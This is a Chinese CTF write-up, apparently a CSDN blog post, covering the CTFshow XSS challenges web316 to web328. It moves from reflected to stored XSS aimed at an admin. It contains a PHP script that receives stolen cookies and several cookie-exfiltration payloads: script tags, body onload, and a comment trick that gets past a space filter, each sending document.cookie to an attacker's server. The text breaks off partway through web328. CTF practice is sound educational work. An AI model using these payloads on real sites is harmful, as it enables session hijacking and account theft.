CTFSHOW-XSS

文章描述了一种XSS攻击的系列案例,从利用`<script>`标签到`onload`事件,以及如何绕过空格过滤。攻击者尝试将受害者的cookie发送到自定义web服务,从反射型XSS过渡到存储型XSS,目标是获取管理员的cookie信息。
摘要由CSDN通过智能技术生成

先给一个XSS平台:XSS平台 - (支持http/https)XSS Platform

web316

先在自己的服务器上开启一个web服务,用来接收flag

<?php
$content = $_GET[1];
if(isset($content)){
file_put_content('./flag.txt',$content);
}else{
echo 'no no no';
}

目的:拿到管理员的cookie

payload:

<script>document.location.href='http://ip/1.php?1='+document.cookie</script>

web317

上面的payload不能用了

payload:

<body onload="document.location.href='http://ip/1.php?1='+document.cookie"</body>

web318

payload同上

web319

payload同上

web320

过滤了空格

payload:

<body/**/onload="document.location.href='http://ip/1.php?1='+document.cookie"</body>

web321

payload同上

web322

payload同上

web323

payload同上

web324

payload同上

web325

payload同上

web326

payload同上.

web327

前面都是反射型,这题开始是存储型

payload还是上面的,写在信的内容处,同时注意收件人是admin

web328

我们先注册一个账号,如果为admin提示不可注册,我们注册一个admin1

密码就是

然后登录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值